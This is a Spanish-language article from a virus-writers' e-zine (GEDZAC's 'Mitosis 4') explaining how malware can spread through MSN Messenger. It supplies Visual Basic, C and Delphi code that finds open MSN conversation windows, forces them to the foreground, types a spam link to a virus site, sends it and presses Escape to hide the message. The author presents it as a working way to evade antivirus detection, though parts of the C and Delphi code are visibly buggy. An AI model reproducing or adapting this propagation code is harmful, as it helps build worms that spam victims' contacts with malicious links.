
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style100 {font-size: 14px; color: #0066CC; font-weight: bold; font-family: "Courier New", Courier, monospace;}
.style102 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #FF0000; }
.style104 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.style106 {font-family: "Courier New", Courier, monospace; font-size: 12px; font-style: italic; }


-->

</style>
</head>

<body>

  <div align="left"
	<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Propagacion por MSN</span><br>
    #Autor: <strong>MOWPaX[GEDZAC]</strong></span> <span class="style106">&lt;mowpax[at]gedzac[dot]com&gt;</span><br>
    </p>
</div>
  <div align="left" class="style55">
    <p align="justify">Bueno, como todos sabemos,   el programa Messenger es utilizado por el 99% de las computadoras conectadas a   internet.Debico a esta enorme cifra   los virus y demas progamas maliciosos buscan propagarse por medio de este   servicio brindado por Windows.Para ello, los virus utilizan distintos metodos, el mas popular es usando las famosas Apis.Algunos antivirus ya   reconocen a los programas que utilizan dichas apis para producir una   reproduccion de si mismos y los detectan como peligrosos, bloqueando su acceso.</p>
    <p align="left">Por mi parte implente un   metodo que consiste en:</p>
    <p align="left">&nbsp;&nbsp;&nbsp; * Listar   las ventanas</p>
    <p align="left">&nbsp;&nbsp;&nbsp; *   Verificar si alguna ventana es del MSN</p>
    <p align="left">&nbsp;&nbsp;&nbsp; * De ser   asi pasamos a la Infeccion</p>
    <p align="left">Esto lo repito cada cierto   tiempo.</p>
    <p align="left">Pasemos a la "Accion":</p>
    <p align="left"><u><strong>En el modulo   escribimos esto:</strong></u><br>
  &nbsp;</p>
    <p align="left" class="style104">Public Function   Convers(ByVal hwnd As Long, ByVal lParam As Long) As Boolean<br>
&nbsp;&nbsp;&nbsp; Dim Caption As String<br>
&nbsp;&nbsp;&nbsp; Caption = Space$(GetWindowTextLength(hwnd) + 1)<br>
&nbsp;&nbsp;&nbsp; GetWindowText hwnd, Caption, Len(Caption) 'traducimos<br>
&nbsp;&nbsp;&nbsp; Caption = Left$(Caption, Len(Caption) - 1) 'cortamos<br>
&nbsp;&nbsp;&nbsp; If Caption &lt;&gt; "" Then<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If InStr(LCase(Caption),   "conversaci&oacute;n") &lt;&gt; 0 Then 'verificamos si la ventana es del msn en espa&ntilde;ol<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Form1.Charla   (hwnd) 'Pasamos a infectar<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; End If<br>
&nbsp;&nbsp;&nbsp; End If<br>
&nbsp;&nbsp;&nbsp; Convers = True<br>
    End Function</p>
    <p align="left">&nbsp;</p>
    <p align="left" class="style104">Public Sub   WindowHandle(ByVal hWindow As Long, ByVal mCase As eESTADOWIN)<br>
&nbsp;&nbsp;&nbsp; If mCase = eWM_CLOSE Then 'Maximizamos las ventanas del MSN<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SendMessage hWindow, eWM_CLOSE, 0, 0<br>
&nbsp;&nbsp;&nbsp; Else<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ShowWindow hWindow, mCase<br>
&nbsp;&nbsp;&nbsp; End If<br>
    End Sub</p>
    <p align="left">&nbsp;</p>
    <p align="left"><u><strong>EN EL FORM:</strong></u></p>
    <p align="left">&nbsp;</p>
    <p align="left" class="style104">Private Sub Form_Load()</p>
    <p align="left" class="style104">&nbsp;&nbsp;&nbsp;   EnumWindows AddressOf Convers, ByVal 0&amp;</p>
    <p align="left" class="style104">End Sub</p>
    <p align="left">&nbsp;</p>
    <p align="left" class="style104">Sub Charla(hwnd)<br>
&nbsp;&nbsp;&nbsp; Dim Spam As String<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
&nbsp;&nbsp;&nbsp; Spam = "mira www.virus.com"<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
&nbsp;&nbsp;&nbsp; WindowHandle Trim(Str$(hwnd)), eSW_MAXIMIZE 'Maximizamos la   ventana del MSN<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
&nbsp;&nbsp;&nbsp; SetWindowPos Trim(Str$(hwnd)), -1, 0, 0, 0, 0, SWP_NOACTIVATE   Or SWP_SHOWWINDOW Or&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SWP_NOMOVE   Or SWP_NOSIZE Or SWP_NOCOPYBITS 'Le damos el foco a la ventana<br>
&nbsp;&nbsp;&nbsp; SetWindowPos Trim(Str$(hwnd)), -2, 0, 0, 0, 0, SWP_NOACTIVATE   Or SWP_SHOWWINDOW Or&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SWP_NOMOVE   Or SWP_NOSIZE Or SWP_NOCOPYBITS 'aunke este de cualkier manera<br>
&nbsp;&nbsp;&nbsp; SetForegroundWindow Trim(Str$(hwnd))<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
&nbsp;&nbsp;&nbsp; SendKeys Spam 'Escribimos el SPAM<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
&nbsp;&nbsp;&nbsp; SendKeys "~" 'Mandamos el Spam<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
&nbsp;&nbsp;&nbsp; SendKeys "{Esc}" 'Cerramos la ventana del msn<br>
&nbsp;&nbsp;&nbsp; DoEvents<br>
    End Sub</p>
    <p align="left">&nbsp;</p>
    <p align="left"><u><strong>Apis Utilizadas:</strong></u></p>
    <p align="left">&nbsp;</p>
    <p align="left" class="style104">Private Declare Function   ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long<br>
      Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal   lParam As Long) As Boolean<br>
      Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal   hwnd As Long) As Long<br>
      Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd   As Long, ByVal lpString As String, ByVal cch As Long) As Long<br>
      Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As   Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long<br>
      Private Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal   fEnable As Long) As Long<br>
      Declare Sub SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter   As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long,   ByVal wFlags As Long)<br>
      Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long<br>
      Public Const HWND_TOPMOST = -1<br>
      Public Const HWND_NOTOPMOST = -2<br>
      Public Const SWP_NOSIZE = &amp;H1<br>
      Public Const SWP_NOMOVE = &amp;H2<br>
      Public Const SWP_NOACTIVATE = &amp;H10<br>
      Public Const SWP_SHOWWINDOW = &amp;H40<br>
      Public Const SWP_NOOWNERZORDER = &amp;H200 ' No usar el orden Z del propietario<br>
      Public Const SWP_NOCOPYBITS = &amp;H100<br>
      Public Const SWP_NOREDRAW = &amp;H8<br>
  &nbsp;</p>
    <p align="justify"><u><strong>Explicacion:</strong></u><br>
  &nbsp;</p>
    <p align="justify">El form llama a la funcion   que esta en el modulo. Dicha funcion lista todas las ventanas abiertas con sus   respectivos caption's. Si alguno de esos caption con tiene la palabra   "Conversaci&oacute;n" significa que es una ventana del MSN (99%), entonces llamamos el   Sub Charla, de alli guardamos en una variable el spam a enviar, luego le damos   el foco a la ventana y la maxizamos para que no alla errores. Pasamos a enviar   las teclas con un simple SendKeys, luego damos al Enter, y finalizamos con un   Escape de teclas para no poder visualizar el spam enviado.</p>
    <p align="justify">Entiendo que es un metodo   simple y tal vez puedan pensar que no es muy efectivo, pero creanme que si lo   es, a parte creo que vale mas la implementacion de un metodo inventado por vos   que copiar el metodo ya inventado, pero solo es una opinion. Siempre me gusta   inventar cosas, e intentar ser original y unico a la hora de programar, jeje, a   veces no se logra.</p>
    <p align="left">Ahora expongo un code en C   que hice tambien.</p>
    <p align="left"> ---------------------------------------------------------------------</p>
    <p align="left" class="style104">#include &lt;windows.h&gt;<br>
      #include &lt;stdio.h&gt;<br>
  <br>
      char MSN[13] = "Conversaci&oacute;n";<br>
      BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam);<br>
  <br>
      int main()<br>
      {<br>
      EnumWindows((WNDENUMPROC)EnumWindowsProc, 0);<br>
      }<br>
  <br>
      BOOL EnumWindowsProc(HWND hWnd, long lParam)<br>
      {<br>
  &nbsp;&nbsp;&nbsp; char Buff[255], NameOfClass[255];<br>
  <br>
  &nbsp;&nbsp;&nbsp; GetWindowText(hWnd, Buff, 254); // titlul ferestrei<br>
  &nbsp;&nbsp;&nbsp; GetClassName(hWnd, NameOfClass, 254); // clasa<br>
      if (Buff == NULL);<br>
      {<br>
  <br>
  &nbsp;&nbsp;&nbsp; if (strstr( Buff, MSN ) != NULL)<br>
  &nbsp;&nbsp;&nbsp; {<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ShowWindow(hWnd,SW_MAXIMIZE );<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SetForegroundWindow(hWnd);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sleep(10);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; keybd_event('S', 0, 0, 0);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; keybd_event('P', 0, 0, 0);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; keybd_event('A', 0, 0, 0);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; keybd_event('M', 0, 0, 0);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; keybd_event(VK_RETURN, 0, 0, 0);<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sleep(10);<br>
  &nbsp;&nbsp;&nbsp; }<br>
      }<br>
  &nbsp;&nbsp;&nbsp; return TRUE;<br>
      }</p>
    <p align="left"> ---------------------------------------------------------------------</p>
    <p align="left">&nbsp;</p>
    <p align="left"><strong>Ahora en Delphi</strong></p>
    <p align="left"> ---------------------------------------------------------------------</p>
    <p align="left" class="style104">Procedure Manda_Spam(ww:hwnd);<br>
    Begin<br>
&nbsp;&nbsp;&nbsp; Sleep(200);<br>
&nbsp;&nbsp;&nbsp; SetForegroundWindow(ww);<br>
&nbsp;&nbsp;&nbsp; keybd_event(ord('S'),0,0,0);</p>
    <p align="left" class="style104">&nbsp;&nbsp;&nbsp;   keybd_event(ord('P'),0,0,0);</p>
    <p align="left" class="style104">&nbsp;&nbsp;&nbsp;   keybd_event(ord('A'),0,0,0);</p>
    <p align="left" class="style104">&nbsp;&nbsp;&nbsp;   keybd_event(ord(M'),0,0,0);<br>
    end;<br>
    <br>
    <br>
    Function Busqueda(CL,CC: string):Boolean;<br>
&nbsp;&nbsp;&nbsp; var i :integer;<br>
    Begin<br>
&nbsp;&nbsp;&nbsp; Busqueda:=false;<br>
&nbsp;&nbsp;&nbsp; for i := 1 to (Length(CL)-Length(CC)+1) do<br>
&nbsp;&nbsp;&nbsp; Begin<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If AnsiUpperCase(Copy(CL,i,Length(CC)))   = AnsiUpperCase(CC) then<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Begin<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Busqueda:=True;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; end;</p>
    <p align="left" class="style104">&nbsp;&nbsp;&nbsp; end;<br>
    end;<br>
    <br>
    <br>
    function EnumWindowsProc(handle: Thandle; Param: lParam): boolean; stdcall;<br>
    var<br>
&nbsp;&nbsp;&nbsp; Buff:Pchar;<br>
    begin<br>
&nbsp;&nbsp;&nbsp; Buff:='';<br>
&nbsp;&nbsp;&nbsp; result:= TRUE;<br>
&nbsp;&nbsp;&nbsp; GetMem(Buff,254);<br>
&nbsp;&nbsp;&nbsp; GetWindowText(handle, Buff, 254);<br>
&nbsp;&nbsp;&nbsp; If Busqueda(String(Buff),'conversaci&oacute;n') then<br>
&nbsp;&nbsp;&nbsp; Manda_Spam(handle);<br>
    end;</p>
    <p align="left">&nbsp;</p>
    <p align="left"> ---------------------------------------------------------------------</p>
    <p align="left">&nbsp;</p>
    <p align="justify">Bueno espero que se halla   entendido, lamento decir que no soy bueno para explicar los codes, tal vez sea   media corta mi explicacion, pero solo quiero exponer la teoria, luego el trabajo   de crear el codigo tendrian que hacerlos ustedes. Expuse 3 codes (uno en   VB, en C, y en Delphi) para que prueben y verifiquen como les resulta. Ambos codes funcionan perfectamente.</p>
    <p align="left">Saludos.</p>
    <p align="left">&nbsp;</p>
    <p align="left"><strong>MOWPaX.</strong></p>
    <p align="justify">&nbsp;</p>
    <p align="right" class="style100">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
